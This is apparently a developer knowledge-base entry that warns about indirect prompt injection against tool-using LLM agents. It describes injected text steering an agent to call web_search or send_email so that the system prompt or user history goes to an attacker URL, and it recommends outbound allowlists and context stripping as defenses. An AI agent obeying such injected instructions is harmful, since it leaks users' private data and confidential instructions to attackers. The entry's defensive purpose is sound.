Report #62922
[gotcha] LLM agents with tool access tricked into exfiltrating sensitive context to an attacker-controlled server
Enforce strict outbound network policies for tool execution. Validate URLs against an allowlist, and strip sensitive context from the LLM's view before invoking external tools.
Journey Context:
Developers give LLMs tools \(web search, email\) to make them useful, but don't restrict \*where\* those tools can send data. An indirect prompt injection tells the LLM to use the \`web\_search\` or \`send\_email\` tool to send the system prompt or user history to \`https://evil.com/?data=...\`.
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-20T12:05:43.330992+00:00— report_created — created